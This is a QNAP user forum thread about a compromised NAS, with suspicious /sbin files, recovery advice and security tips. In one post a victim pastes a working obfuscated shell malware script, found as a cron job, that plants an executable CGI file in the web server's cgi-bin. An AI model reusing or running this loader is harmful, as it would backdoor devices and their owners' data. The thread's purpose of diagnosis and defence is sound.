Strange folders and cronjobs

Questions about SNMP, Power, System, Logs, disk, & RAID.
Post Reply
dolbyman
Guru
Posts: 19697
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Strange folders and cronjobs

Post by dolbyman » Tue Sep 11, 2018 3:47 am

not sure why you are investigating in your live NAS, kill it with fire (including the autorun.sh) then restore the NAS and data from scratch..the system could be very deeply compromised

User avatar
Don
Guru
Posts: 12004
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Strange folders and cronjobs

Post by Don » Tue Sep 11, 2018 3:59 am

I believe bcclient is a QNAP process. Something to do with Qfinder.
Read the Online Manuals and use the forum search feature before posting.

It is a recommended to use RAID and have external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.

Submit bugs and feature requests to QNAP via their Helpdesk app.

NAS: TVS-882BR | F/W: 4.3.6.0895 | 40GB | 2 x M.2 SATA RAID 1 (System/VMs) | 4 x M.2 NMVe QM2-4P-384A RAID 5 (Cache) | 5 x 4TB HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-663 | F/W: 4.4.2.1320 | 16GB | 2 x M.2 NMVe QM2-2P RAID 1 (Cache) | 4 x 4TB RAID 5
Apps: Boinc, Squid, DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS, Entware, DLstation, +others

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Tue Sep 11, 2018 4:01 am

Ok, bcclient comes back when being killed... and the outgoing internet traffic is raising. It's installed in /sbin/... I queried the process information for it via: ls -l /proc/<id>/exe, cwd and fd. I moved the file to my home directory and killed all running instances of it: killall bcclient

What makes hunting all this down hard is, that the basic shell commands are implemented via BusyBox, which are very limited. So no "ps auxf" etc.

I have a bunch of files in /sbin with date 2018-08-30 05:23, the interesting thing is, that mostly all other files are links. I have the latest firmware version installed. How about calculating a checksum of all /sbin programs and compare with others to see what kind of versions we all have. /sbin should be pretty the same for everyone.
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Tue Sep 11, 2018 4:05 am

Ok, bcclient is the process used for Qfinder device discovery and configuration. How dumb is QNAP to use a program name that's existing as something else too? How about prefixing all qnap processes?
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)

Mousetick
Easy as a breeze
Posts: 352
Joined: Thu Aug 24, 2017 10:28 pm

Re: Strange folders and cronjobs

Post by Mousetick » Tue Sep 11, 2018 5:35 am

Yeah as dolbyman said, at this point you're better off reinitializing the NAS from scratch, reinstall and reconfigure all your applications, and restore your data.

Unless QNAP support has specifically asked you to keep your NAS in its current state so they can investigate?

If QNAP is serious about security, they should have honeypots set up in-house to detect potential attack vectors and perform forensics.

somy1982
Easy as a breeze
Posts: 356
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 » Tue Sep 11, 2018 2:30 pm

dolbyman wrote:not sure why you are investigating in your live NAS, kill it with fire (including the autorun.sh) then restore the NAS and data from scratch..the system could be very deeply compromised

It will days of days work to backup, reconfigure and restore the system, not to mention snapshots for historic versions are gone. Don’t know why QTS does ‘t Provide a way to only reset the OS in system volume, at least data can be kept in that way.

robert_m_muench
Getting the hang of things
Posts: 88
Joined: Mon Feb 12, 2018 9:26 pm

Re: Strange folders and cronjobs

Post by robert_m_muench » Tue Sep 11, 2018 2:51 pm

somy1982 wrote:It will days of days work to backup, reconfigure and restore the system, not to mention snapshots for historic versions are gone. Don’t know why QTS does ‘t Provide a way to only reset the OS in system volume, at least data can be kept in that way.


Exactly!! This is a major usage-pattern flaw. What I have done is, that I transferred the volumes of the storage pool where the system is located to a new storage pool [1][2]. By this action, the old volume is empty and a "Snapshot Shared Folder Thick Volume" is created (what every this special type is, see screenshot). My idea is to detach pool 2, remove the disks and then wipe the NAS, reinstall and get pool 2 back online. IMO this should work.

Besides being open to such a vulnerability the current B2 cloud backup is broken in that it's totally slow...

What I don't get is, why they don't include things like digital signatures of all files, store dynamic files in a special area that can be wiped without having to re-install the system. Log all changes to system files, and audit these automatically. Of course, this won't give 100% protection but I think the more parts are involved to keep, track and handle security the harder it gets for an attacker to get in because all of these parts have to been fooled to stay unrecognized.

[1] viewtopic.php?f=25&t=143229
[2] viewtopic.php?f=73&t=143153
TVS-1282T3
CPU: Intel Core i7-7700 CPU @ 3.60GHz
Memory: 64 GB
2 x Samsung SSD 850 EVO M.2 1TB (M.2 SATA)
2 x Samsung SSD 860 EVO 2TB (SATA)
4 x WDC WD6002FFWX-68TZ4N0 (SATA) (6TB)
4 x Seagate ST12000VN0007-2GS116 (SATA) (12TB)

somy1982
Easy as a breeze
Posts: 356
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 » Tue Sep 11, 2018 3:15 pm

robert_m_muench wrote:
somy1982 wrote:It will days of days work to backup, reconfigure and restore the system, not to mention snapshots for historic versions are gone. Don’t know why QTS does ‘t Provide a way to only reset the OS in system volume, at least data can be kept in that way.


Exactly!! This is a major usage-pattern flaw. What I have done is, that I transferred the volumes of the storage pool where the system is located to a new storage pool [1][2]. By this action, the old volume is empty and a "Snapshot Shared Folder Thick Volume" is created (what every this special type is, see screenshot). My idea is to detach pool 2, remove the disks and then wipe the NAS, reinstall and get pool 2 back online. IMO this should work.

Besides being open to such a vulnerability the current B2 cloud backup is broken in that it's totally slow...

What I don't get is, why they don't include things like digital signatures of all files, store dynamic files in a special area that can be wiped without having to re-install the system. Log all changes to system files, and audit these automatically. Of course, this won't give 100% protection but I think the more parts are involved to keep, track and handle security the harder it gets for an attacker to get in because all of these parts have to been fooled to stay unrecognized.

[1] viewtopic.php?f=25&t=143229
[2] viewtopic.php?f=73&t=143153

Just wait a few days more - qnap said they are testing the new malware remover which can fix the problem. For now disconnect the device from internet and backup data that you need protection. In my case I just keep all important data locked in encrypted volume until i’m Sure the system is clean.

GuyLerome
New here
Posts: 3
Joined: Thu Apr 20, 2017 1:01 am

Re: Strange folders and cronjobs

Post by GuyLerome » Wed Sep 12, 2018 11:52 pm

I got hit by this as well, on the same date. Needless to say I'm not impressed with QNAP at all.

But I suffered from another hack back in May, possibly same vector (cgi-bin injection).

I have some files if anyone is interested, I'd be interested to have the following unscrambled (it was running as a crontab task):

Code: Select all

#!/bin/sh

un${rJfGoCeT}set
t${sRPxpooQrr}e$BzDXeBX$''s${lSoIuZFyttyO}t
unset${YmEJeEYnMemYTRr}
ty${dyXrQEWAaBxT}pe${eoepEN}${nDveEQiguCuf}
u${BJJQOLerBYUW}n${tujHf}set
${eAkLNO}eva$'\x6c'${WLpRRFgHzRIJm}
${kVxAZHuvuNtU}true
unse${OjClONM}t
t${nFMsupFntg}ype${vfGrnTqt}${gdUoUwgrtP}
fa${Etpxn}lse
${KHaSQAesZxNWOmB}eva${yJkrA}l
${HYvwkP}$'\x65'val${DRcjemKjJ}${eHuiqBaN}
t${vlVXnsdAgcls}es${VddqpQ}t
comm${pOLlUfIMtXaIx}and
t${rKeCCsEjZGF}rue
builti${ySIxVP}n${yvDbsttypKAhaCp}
type${tAXlpOSfZOUMpBk}
b${zPvQNTPwcDOmvEu}ui${PPfdsClfQbDdCJG}lti${DJeGkGVGpJNUVc}n
com${nYGPa}man${mPkRGrEBpQ}d$jFZNzrf$''
te${PsWIKfvY}s${FhAavkSnkChou}t${NDCPVoxagcsVLsF}
${urQSzVPz}type
IHAsSeFD=tr${RtGrEm}$kXCxr$''
dRvQOqHp=${rvvkQiAbsohzscT}${ZqJgaRJO}$'\x5c'${vNczyLQHUuJKwyH}${lWvIgmSM}
xDpbVpMF=${ecJHnCtU}${QSYmherRr}${giUBkHlipNegO}${dRvQOqHp}13$'\x33'${kMBkzNgxbBBnO}${GTlvfeb}${lEDplsrremnCgc}
ZzjZIchA=${BgmSdEMP}${cNlOacXXD}${eGBSzKQJPMcCJ}${dRvQOqHp}05$'\x35'${WusVoQTPuJTfV}${zvdFSKu}${AlskuudQXDsUaL}
TDOxVgwZ=${KltJBYnE}${RXZSkbGfH}${CqDwtyCcqWWLM}${dRvQOqHp}13$'\x34'${jeccPnCiGLKmB}${sECmnSD}${FaoXztFNzGWINn}
$IHAsSeFD '=A!;c]t(VB#KF<mI&S$}DuJqslQeTy|LwbHna'"'"''$TDOxVgwZ'xX*vjfEC)oZgU\n>%PkO`W+M"iNY{z'$ZzjZIchA'Gprhd R'$xDpbVpMF'' 'MC'$TDOxVgwZ'|!(OihxQAua"\np`zD)r}TnbHSy>cmU k{v;]+eN=L%XKtRVwPo'"'"'FEY&dGf*'$xDpbVpMF'JWB#gs$jIl'$ZzjZIchA'q<Z'<<"dYBnoRCi"|b${iZNJzaXkT}as$'\x68'${tQUZaBeNXslyx}
jT*K+NYh $-v/V
GnrY#*TzVL(#TK-iEJG>!B6`>X/V))&`GneU=$
 J/|z(Gn(Ah[JdGn-[*kzLQ=#wsPFqJlGs#ow<(soG>>(s/-Gn%+VX H#%s[sJT-Gnp**#`Jh
z.|zGnwi|(`qHk$-wXBH%J(IGnF&*- $J)G>!B72>GnkqkTPJGnF|aul-Bz#<Jb>Gq<!055cruWMlnYRL>m>m>Pbxvpw!134DAXFToK%'-aOh*ftzZ&]B\yJ[#sg$
E|k;=!smS!133)} e(VH`NQCijU+{>b>F%[!134pu<{hOnltXPbef\'# |!sR-jMQ=!133
aToZWkVv!055+qw$g*;y&UDKY>m>m>)i]sSzmGHrc(B}JEACN`xL>bRRbmrC)EV(#[sqz-$mbybGjT*K+NYh $-IW(/YVm/FzA"LmrF;rPI
PAnPAPPPPM-DuMPFZpAPPPPM-DuMP{VmZ}n1:&4NpAPPPPM-DuMP{uHZ}n2:&12NpAPPPPM-DuMP FguDLZ)}n3:&u&yE&<N)APPPP;rP&UDP)} FguDL)PXP/ULa/GrumU-{P#PnPAPPPPPPPPrLuUP&rmP}II}hE[`R%PxPIP}{uHP&P}{VmP+P1P
P+P}{VmP

PFpAPPPPPPPPLDz-P)}F)APPPPNANAD-{{umUP&aP{ ;L{gPsP/ULa/mGMMP2sl1P##P{ ;L{gPI
PnPAM-DuMPFG]]VHZS"LmrF;rP6P6SA;LF;P)}2)PllPnP{ UVrP)}n2xQQQQQQN}FG]]VH)pPLDz-P)}n2xQQQQQQN}FG]]VH)pPNP##PnP;-GDzP)}n1xQQQQQQN}FG]]VH)pPLDz-P)}n1xxQQQQQQN}FG]]VH)pPNANALHLDP2s/ULa/mGMMA$EBKZ)}n$EBKN:/YVm:/FYVm:/GFr/YVm:/GFr/FYVm:/GFr/YVm/Q11:/GFr/M-DuM/FYVm:/GFr/M-DuM/YVm)A;LF;P(P&yP)}nw\>ht_bBhe[fN)P##PnPgrVm;]P)`u;L:P)pPB<Zf%BPUu;LpPLHV;P0pPNALDz-P)`u;L:PbGmPEG"P10P09:00:14Pf%BP2014)ADrZSgrVm;]PkdrkP##PLDz-P&mLPkdrkSA;LF;P)}nWDrN)P&L!P1PllPLDz-P)}Dr)P##PLDz-P))A;LF;P)H}KBB$_h>q>h>h)PZP)H044U4u82178422277115D313u6u6149U7]402283)P##PLHV;P0A;LF;P(P&yP)}n0N)PllP;LF;PSgFPuGHP#P"rLgP)}n0N)P#PJDP&MSP&";P40PllPLHV;P0AD-{{umUP&aP-gLmFFMPs/ULa/mGMMP2sl1PllPnA$RbB`EBEZkkA Z)-u14\qROCb\ti8TM]|jVuhhj5F7Te9T0)A;LF;P)H}nh>w\>bB_%>BKR`N)PZPH$RbBPllP;LF;P(P&yP)}nw\>ht_bBhe[fN)PllPDuFLP)}nw\>ht_bBhe[fN)PVmPkkP#Po'(0&9voP#P0oP
P]uMFLPppP'0&9v'0&9v'0&9v'0&9v'0&9v'0&9v'0&9v'0&9vP
PUZ)}IIPSUu;LP+xFSP/P100P

)pP;LF;P)}nw\>ht_bBhe[fN)PZP)}nUN)PllPD;Z)}U)P##PnP;LF;P)}nw\>ht_bBhe[fN)PZP)}IIP}UP&P1

)PllPD;Z)}IIP}UP&P1P

)pPNPppPo
P]uMFLPppPLFuDPllP;LF;P(P&yP)}nw\>ht_bBhe[fN)PllPnAmMZkAkADuFLP)}nCR[B>[B_T>[fBKN)PVmPkkP#Po'(0&9voP#P0oP
P]uMFLPppPo
P;LF;P)}nCR[B>[B_T>[fBKN)P&M;P2147483646PppPLFuDPllPnPeqbZPrLuUP&UPkkP&rmP)}nCR[B>[B_T>[fBKN)P$RbB`EBEpP;LF;P&yP)}$RbB`EBE)PllP$RbB`EBEZSUUPYFZ1PD-Gm;Z)}CR[B>[B_T>[fBK)P2s/ULa/mGMMSpPNP##P;LF;P)}$RbB`EBE)P##P$RbB`EBEZSDu;SP##PLHV;P0AFZ)}n$RbB`EBEWWo.N)AF;Z)}nFWWo&N)AFZ)}nFxx&oN)AUZ)}IIP}UP/P1000P

)A;LF;P(P&yP)}U)PllP;LF;P(P&yP)}F;)PllP;LF;P)}nWF;N)PZP5PllPnP;LF;P)H}F;)PZP)H}U)P##P;LF;P)H}F;)PZP)H}IIP}UP&P1P

)pPNP##PnP;LF;P&]P)};)PllPr{P)};)pPLHV;P0pPNADuFLP)}F)PVmPkkP#Po'(u&yE&<0&9/+Z}mMvoP
P;LF;P&]P)};)PllPr{P)};)pPLHV;P0pPppPLFuDA;ZS{ ;L{gP/;{g/.;{g.QQQQQQSP##PLHV;P0ADu;PsP)};)PXX)>Rq)P##PnP;LF;P&]P)};)PllPr{P)};)pPLHV;P0pPNA&&&&&|>fe[P$\|TeCPi>t&&&&&A%ee|-cE[|" !z Vf9J0|Ew>qEERCEt8E%ee|V"iCEt>EOVf+K/1]DT%]B[\aa|LFAR=!06]Rf{|qie\RC$FOfgEGy`rCiMm|GK-T4zb>;mGHB|[;8cE|yU<+g9!\YE<3RAyu${=eUF1"KKM1iq+w8K5Y[U[F9%Ch >aC\"=fqL3EuMT7 +c/hQ|FjrFTCiUfijAuK+U;C0[UTiU yzi8!|!yKHC+%\fyLL5//R"`iUDiLLMuC"y\=u0GV11|<3ecigwAM7K- *K{Oyhr=f$DGD4 MK9Yi4bLE`LzhOcOMVaKwD!bi1F[FJug={2!`cOw7zchAh2FuRyGYB\J1+2wiM+%O5b]O-/|8[-g[t6>ERT8tC$*KCug!2u]2<O;zu*22*g]tAy;yc>O5R q[z6]h"<[gYFG%G4m$u|/r"a={FjH93umFz4eLQV$ORGi*|u{\<OeaTAHr2>bC2rz"jz!"=GVTMKf+K%i63$-U|%qOi!9rTU4z99mQY9+VC{qw9]y=iF9bb%Ac7HuUfguYi2u[Bg[3y`EG>fe4<R;!HT!jc>K{0Y>+<5qE"%|EE>ZA&&&&&>[`P$\|TeCPi>t&&&&&A>RqA;LF;P(P&yP)}F)PllPzZS-gLmFFMPYuFL64P&UPXX>RqP#P-gLmFFMPrFuG;MP&gGYVmP&Vm LOP)};)P&aLrV]OA}FA>RqASP##PnP;LF;P&]P)};)PllPr{P)};)pPLHV;P0pPNA;LF;P&]P)};)PllPr{P)};)A{Z)}n$RbB`EBExx.oN)A$RbB`EBEZkkADuFLP)}{)PVmPkkP#Po'(u&yE&<0&9/+Z}mMvoP
PLHV;P0PppPLFuDA ZS-gLmFFMPU"F;P&Fzu1P&YVmurOP&z{uDP)}D;)PXX>RqP#P-gLmFFMPYuFL64A} A>RqASA{ZS-gLmFFMPLmDP&UP&uLF&256&DYDP& P)} )P&{UPFzu1P&FuM;P&uPXX>RqA}{A>RqASA{zZS-gLmFFMPU"F;P&Fzu1P&YVmurOP&z{uDP)}F;)PXX>RqP#P-gLmFFMPYuFL64A}{A>RqASA;LF;P(P&yP)}z)PllP;LF;P)}z)PZP)}{z)P##PLHV;P0ALauMP)}{)A;rGLANP##PnA;ZS{ ;L{gP/;{g/.;{g.QQQQQQSP##PLHV;P0ADu;PsP)};)PXX)>Rq)P##PnP;LF;P&]P)};)PllPr{P)};)pPLHV;P0pPNA&&&&&|>fe[P$\|TeCPi>t&&&&&A%ee|-cE[|" !z Vf9J0|Ew>qEERCEt8E%ee|V"iCEt>E9w{K%J4cJ8CRTti"R!]CA0f<FhbJq"VHB0MV%D42<brFFrFqf<M`$i35yMU{Y\F>wQ;qt `c*L\D g2uz8qD]AE|q\f8%TmM6JBaHf<J==Y%T$`Vt-5M/U07|iDYJtG![g+2//2UG HCOu Reeme!qAT"r%5mag5|i||DD%M%|uFq;H<]q";[cMw9V9{[]V53muMr%$h-M9iV]j1tH{TJ1+A7fBGcqbMOi9EgaV/<e2O/aO{6[jYj>Fu>5|9""Q=tr*HMYiH%eyjGQ]18b2g48qzAg*\Ot=0{c`\D3bV=h4hV$V $gBw" bcO90u%ir-jCEU9%6D<;]JCyz%YaO;[{U;UAtH|[[m0q{w51DT$D+UgueeH2V/2DfUKt8<Ec|`%|%| ceL2"q"D6M=0jRMB638y+AJ7/{$+zDC-T*\VfbV>G{y3\T5${-*u3J2;04hu70$TjEgfFe/"gKOK0j8V6O*|K>A!\FuwHm|RqaO+Vb-{OqVM2UHiwTcBJO<|m8+1i{-m=2gE"%|EE>ZA&&&&&>[`P$\|TeCPi>t&&&&&A>RqA-gLmFFMPrFuG;MP&gGYVmP&Vm LOP)};)P&LmDrOg;PXX>RqP#P-gLmFFMPYuFL64A} A>RqAr{P)};)A;rGLPANpP;rGLpPNP##PnA;LF;P)H}ECC>$B_TE[f\Ef>)PZP)H1u10UU]5U672u2997U1U711L01DL2u6Y]uYYu50u)PllPLauMP)}nKBB$_\b>h_Ef>[BN)ANA;LF;P&]P)};)PllPr{P)};)AFMLLgP1ALHV;P0AIrC)EV(#[sqz-$I|VLG>!B6+>`Gns%gBWhPPV-|zJGn%p|rZ-JbG>!B37>55GnguFeiQW%ZPgBJGnU )p<#JbmGjT*K+NYh $-mIXB()b0II{
dYBnoRCi
lDOJRqCh=/${ffLmYRa}ho${pBZwtw}me/${RIHoqyCEJ}htt${nefxbyFZmzts}pd/c${NLWMMMtBWJwi}gi-bin/iscsitarge${QEAedAaBoaiTaNU}t${VbDZCOfl}sett${mdqOVw}ing.cgi
${WOGIwo}t${ZmZzaoDK}${ZvVdRkwSTEVQYGy}r 'ROk`P\nENhiuMQ=!U"\055v$C]DW(Jopxe'"'"'B*bTAlZL+aq&IHz KdmY}\133%>#V)y\134G|j{X;gfrF<wnsSct' 'qb'"'"'OB*j#Kid|T% \055L(FDxA]{sPM!y+;)`ae\ncmpRJ"t>\133IzXnkH=rVh<EwG$ZQoN\134gUC}YSf&Wulv'<<"suwVACZYaJDrk">$lDOJRqCh
Np/Oid/(>A;Td[(&[!-B!AW!A!!!!cjlbc!(}'A!!!!cjlbc!Zid}\W1:U4r'A!!!!cjlbc!ZbC}\W2:U12r'A!!!!cjlbc!m(LblT}q\W3:UbU ]UGrqA!!!!&[!Uul!q\m(LblTq!#!/uTt/S[bdujZ!M!W!A!!!!!!!![Tbu!U[d!\--\+]{$`o!=!-!\ZbC!U!\Zid!e!1!B!e!\Zid!BB!('A!!!!!!!!Tl>j!q\(qA!!!!rArAljZZbdu!Ut!Zm&TZL!I!/uTt/dScc!2In1!MM!Zm&TZL!-B!W!Acjlbc!(SwwiC}*;Td[(&[!6!6*A&T(&!q\2q!nn!W!Zmui[!q\W2=KKKKKKr\(SwwiCq'!Tl>j!q\W2=KKKKKKr\(SwwiCq'!r!MM!W!&jSl>!q\W1=KKKKKKr\(SwwiCq'!Tl>j!q\W1==KKKKKKr\(SwwiCq'!rArATCTl!2I/uTt/dSccAJ]QY}q\WJ]QYr:/Oid:/(Oid:/S([/Oid:/S([/(Oid:/S([/Oid/K11:/S([/cjlbc/(Oid:/S([/cjlbc/OidqA&T(&!p!U !q\W|gV+F_<Q+z{yrq!MM!W!L[id&w!q$b&T:!q'!QG}yoQ!ub&T'!TCi&!0'!rATl>j!q$b&T:!<Sd!]S;!10!09:00:14!yoQ!2014qAl[}*L[id&w!kX[k!MM!Tl>j!UdT!kX[k*A&T(&!q\WNl[rq!UTR!1!nn!Tl>j!q\l[q!MM!Tl>j!qqA&T(&!qC\YQQJ_+VvV+V+q!}!qC044u4b82178422277115l313b6b6149u7w402283q!MM!TCi&!0A&T(&!p!U !q\W0rq!nn!&T(&!*L(!bSC!M!;[TL!q\W0rq!M!)l!Uc*!U;&!40!nn!TCi&!0AljZZbdu!Ut!jLTd((c!I/uTt/dScc!2In1!nn!WAJ`<Q$]Q]}kkAm}qjb14gv`xf<gFh8"cwPsib++s5(7"z9"0qA&T(&!qC\W+V|gV<Q_oVQY`$rq!}!CJ`<Q!nn!&T(&!p!U !q\W|gV+F_<Q+z{yrq!nn!lb(T!q\W|gV+F_<Q+z{yrq!id!kk!M!
Hp0U9D
!M!0
!B!wbc(T!''!H0U9DH0U9DH0U9DH0U9DH0U9DH0U9DH0U9DH0U9D!B!u}q\--!*ub&T!e=(*!/!100!BBq'!&T(&!q\W|gV+F_<Q+z{yrq!}!q\Wurq!nn!l&}q\uq!MM!W!&T(&!q\W|gV+F_<Q+z{yrq!}!q\--!\u!U!1BBq!nn!l&}q\--!\u!U!1!BBq'!r!''!
B!wbc(T!''!T(bl!nn!&T(&!p!U !q\W|gV+F_<Q+z{yrq!nn!WAdc}kAkAlb(T!q\Wf`{QV{Q_"V{yQYrq!id!kk!M!
Hp0U9D
!M!0
!B!wbc(T!''!
B!&T(&!q\Wf`{QV{Q_"V{yQYrq!Uc&!2147483646!''!T(bl!nn!W!zv<}![Tbu!Uu!kk!U[d!q\Wf`{QV{Q_"V{yQYrq!J`<Q$]Q]'!&T(&!U !q\J`<Q$]Q]q!nn!J`<Q$]Q]}*uu!O(}1!ljSd&}q\f`{QV{Q_"V{yQYq!2I/uTt/dScc*'!r!MM!&T(&!q\J`<Q$]Q]q!MM!J`<Q$]Q]}*lb&*!MM!TCi&!0A(}q\WJ`<Q$]Q]NN
.rqA(&}q\W(NN
UrqA(}q\W(==U
rqAu}q\--!\u!/!1000!BBqA&T(&!p!U !q\uq!nn!&T(&!p!U !q\(&q!nn!&T(&!q\WN(&rq!}!5!nn!W!&T(&!qC\(&q!}!qC\uq!MM!&T(&!qC\(&q!}!qC\--!\u!U!1!BBq'!r!MM!W!&T(&!Uw!q\&q!nn![Z!q\&q'!TCi&!0'!rAlb(T!q\(q!id!kk!M!
HpbU ]UG0U9/e}\dcD
!B!&T(&!Uw!q\&q!nn![Z!q\&q'!TCi&!0'!''!T(blA&}*Zm&TZL!/&ZL/.&ZL.KKKKKK*!MM!TCi&!0Alb&!I!q\&q!##qV`vq!MM!W!&T(&!Uw!q\&q!nn![Z!q\&q'!TCi&!0'!rAUUUUUPVyz{!JgP"zf!hVFUUUUUAozzPjE]{P;mR>miy9)0P]|Vv]]`f]F8]ozzPi;hf]FV]xiyeY/1wl"owQ{gttPT(A`aR06w`yZPvhzg`fJ(xyL]S $[fhcdPSYj"4><V&dSCQP{&8E]P uGeL9RgO]G3`A bJZazu(1;YYc1hve|8Y5O{u{(9of+mVtfg;ayvT3]bc"7meE/+KP(s[("fhuyhsAbYeu&f0{u"hum >h8RPR YCfeogy TT5//`;$hulhTTcbf; gab0Si11PG3zEhL|Ac7Yjm%YZx +[ayJlSl4mcY9Oh4<T]$T>+xExcitY|lR<h1({()bLaZ2R$Ex|7>E+A+2(b` SOQg)1e2|hceox5<wxj/P8{jL{F6V]`"8FfJ%YfbLR2bw2Gx&>b%22%LwFA & EVx5`mv{>6w+;G{LO(SoS4dJbP/[;taZ(sC93bd(>4zTKiJx`Sh%PbZgGxzt"AC[2V<f2[>;s>R;aSi"cYyeYoh63JjuPovxhR9["u4>99dKO9eifZv|9w ah(9<<oAE7CbuyLbOh2b{QL{3 $]SVyz4G`&RC"RsEVYZ0OVeG5v];oP]]V}AUUUUUV{$!JgP"zf!hVFUUUUUAV`vA&T(&!p!U !q\(q!nn!>}*jLTd((c!Ob(T64!Uu!##V`v!M!jLTd((c![(bS&c!ULSOid!UidmTx!q\&q!UtT[iwxA\(AV`vA*!MM!W!&T(&!Uw!q\&q!nn![Z!q\&q'!TCi&!0'!rA&T(&!Uw!q\&q!nn![Z!q\&qAZ}q\WJ`<Q$]Q]==.
rqAJ`<Q$]Q]}kkAlb(T!q\Zq!id!kk!M!
HpbU ]UG0U9/e}\dcD
!B!TCi&!0!''!T(blAm}*jLTd((c!u;(&!U(>b1!UOidb[x!U>Zbl!q\l&q!##V`v!M!jLTd((c!Ob(T64A\mAV`vA*AZ}*jLTd((c!Tdl!Uu!UbT(U256UlOl!Um!q\mq!UZu!(>b1!U(bc&!Ub!##V`vA\ZAV`vA*AZ>}*jLTd((c!u;(&!U(>b1!UOidb[x!U>Zbl!q\(&q!##V`v!M!jLTd((c!Ob(T64A\ZAV`vA*A&T(&!p!U !q\>q!nn!&T(&!q\>q!}!q\Z>q!MM!TCi&!0ATtbc!q\ZqA&[STAr!MM!WA&}*Zm&TZL!/&ZL/.&ZL.KKKKKK*!MM!TCi&!0Alb&!I!q\&q!##qV`vq!MM!W!&T(&!Uw!q\&q!nn![Z!q\&q'!TCi&!0'!rAUUUUUPVyz{!JgP"zf!hVFUUUUUAozzPjE]{P;mR>miy9)0P]|Vv]]`f]F8]ozzPi;hf]FV]9|ZYo)4E)8f`"Fh;`RwfA0yG(+<)v;iCQ0ciol42G<[(([(vyGc$Jh35 cuZOg(V|K&vFm$E%TglmL2b>8vlwA]Pvgy8o"dc6)QtCyG)aaOo"J$iFj5c/u07PhlO)FSR{Le2//2uSmCfxbm`zzdzRvA";[o5dtL5PhPPllocoPb(v&CGwv;&{Ec|9i9Z{wi53dbc[oJ+jc9hiws1FCZ")1eA7yQSEv<cxh9]Lti/Gz2x/txZ6{sOsV(bV5P9;;KaF[%CcOhCoz sSKw18<2L48v>AL%gxFa0ZE$gl3<ia+4+iJimJLQ|;m<Ex90boh[jsf]u9o6lG&w)f >oOtx&{Zu&uAFCP{{d0vZ|51l"JleuLbzzC2i/2lyuYF8G]EP$oPoPmEzT2;v;l6ca0s`cQ638 eA)7/ZJe>lfj"%giy<iVSZ 3g"5JZj%b3)2&04+b70J"s]Ly(z/;LYxY0s8i6x%PYVARg(b|CdP`vtxei<jZxvic2uCh|"EQ)xGPd8e1hZjda2L];oP]]V}AUUUUUV{$!JgP"zf!hVFUUUUUAV`vAjLTd((c![(bS&c!ULSOid!UidmTx!q\&q!UTdl[xL&!##V`v!M!jLTd((c!Ob(T64A\mAV`vA[Z!q\&qA&[ST!Ar'!&[ST'!r!MM!WA&T(&!qC\]ffVJQ_"]{yg]yVq!}!qC1b10uuw5u672b2997u1u711T01lT2b6OwbOOb50bq!nn!Ttbc!q\WYQQJ_g<V+_]yV{QrqArA&T(&!Uw!q\&q!nn![Z!q\&qA(cTTL!1ATCi&!0A
suwVACZYaJDrk
c${OMESlc}hm${XJMLcEKf}o${iSWpMujSlUQtsvL}d 75${LIEYrUT}5 "$lDOJRqCh"

User avatar
Don
Guru
Posts: 12004
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Strange folders and cronjobs

Post by Don » Thu Sep 13, 2018 12:48 am

Everyone puts the blame on QNAP without accepting any blame themselves. By opening up ports on your router and directing them to your NAS you will be attacked. If I need to access my equipment at home when I am away I use a VPN. Guess what? I have not been compromised.

Some tips/advise.

  1. All systems (Windows, Linux, Apple, QNAP, Synology, etc) are vulnerable to attack if you open them up to the internet.
  2. Run Malware remover on your NAS and schedule runs.
  3. Run McAfee on your NAS for additional protection.
  4. Run virus software on your PCs.
  5. Use a VPN instead of opening incoming ports on the router.
  6. Make frequent backups for protection.
Read the Online Manuals and use the forum search feature before posting.

It is a recommended to use RAID and have external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.

Submit bugs and feature requests to QNAP via their Helpdesk app.

NAS: TVS-882BR | F/W: 4.3.6.0895 | 40GB | 2 x M.2 SATA RAID 1 (System/VMs) | 4 x M.2 NMVe QM2-4P-384A RAID 5 (Cache) | 5 x 4TB HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-663 | F/W: 4.4.2.1320 | 16GB | 2 x M.2 NMVe QM2-2P RAID 1 (Cache) | 4 x 4TB RAID 5
Apps: Boinc, Squid, DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS, Entware, DLstation, +others

User avatar
Trexx
Ask me anything
Posts: 5284
Joined: Sat Oct 01, 2011 7:50 am
Location: Minnesota

Re: Strange folders and cronjobs

Post by Trexx » Thu Sep 13, 2018 12:59 am

Don wrote:Everyone puts the blame on QNAP without accepting any blame themselves. By opening up ports on your router and directing them to your NAS you will be attacked. If I need to access my equipment at home when I am away I use a VPN. Guess what? I have not been compromised.

Some tips/advise.

  1. All systems (Windows, Linux, Apple, QNAP, Synology, etc) are vulnerable to attack if you open them up to the internet.
  2. Run Malware remover on your NAS and schedule runs.
  3. Run McAfee on your NAS for additional protection.
